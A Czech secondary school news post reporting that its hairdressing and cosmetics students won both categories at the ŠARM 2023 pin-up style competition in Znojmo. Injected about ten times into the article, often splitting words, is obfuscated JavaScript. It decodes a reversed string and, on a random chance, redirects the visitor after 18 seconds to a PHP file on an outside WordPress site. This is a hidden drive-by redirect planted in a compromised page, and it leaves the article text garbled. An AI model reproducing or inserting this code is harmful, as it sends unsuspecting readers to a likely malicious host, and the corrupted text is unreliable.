Rainbow page separator

Víte, co je móda PIN UP? Obchodka ano!

Středa, 19. dubna 2023

Po tříleté pauze naše děvčata z oboru Kadeřnice a Kosmetické služby zavítala do města  Znojma, kde se konal již. 10.  ročník soutěže ŠARM 2023. Soutěž je určena pro žáky, nikoli pro profesionály. Le$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní ročník byl zaměřený na téma „Móda ve stylu PIN UP“. Ta$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to móda je současná obdoba stylu inspirovaná především swingovými padesátými léty a tehdejšími idoly krásy Marlene Dietrich a Marylin Monroe. Typickými prvky účesu jsou romantické spirály lemující obličej doplněný o vlnky – tzv. Vic$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tory rolls. V líčení $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to jsou červené rty, kočičí oční linky a výrazná řasenka.

Za obor Kadeřník soutěžila žákyně druhého ročníku Alena Vaverová s modelkou Lucií Kaplanovou ze stejného ročníku. Obor Kosmetické služby reprezen$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovala Marie Sázavská 

s modelkou Jessicou Vejvodovou, obě žákyně třetího ročníku. Velký dík patří Petře Matulkové z prvního ročníku oboru Kosmetické služby, která se postarala o účes pro Jessicu.

Každé soutěži předchází velká příprava, řeší se kostým, vhodné doplňky a vše se musí zpracovat tak, aby zadané téma bylo dodrženo. Složi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tost a nápadi$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tost nezná hranic, ale musí se dodržet pravidla, která jsou předem známa. Jedna ze známých písní českého humoristického písničkáře Ivana Mládka se nazývá „Znojmo, vidím tě dvojmo“. A ten$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to slogan se báječně hodil na výjimečný úspěch děvčat. V silné konkurenci ostatních škol děvčata získala obě prvenství, takže na pomyslných stupních vítězů byla naše škola na $NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom nejvyšším vidět opravdu dvakrát.

Oběma děvčatům gratulujeme! Poděkování též patří paní Naděždě Mladé a paní Michaele Kobzové Hallerové, která děvčata připravovala. 

Věřím, že každá zkušenost děvčata obohatí a dodá odvahu do dalších aktivit, které jistě budou následovat.

 

Radka Pospíchalová 

Střední škola obchodní a služeb, s.r.o., Žďár nad Sázavou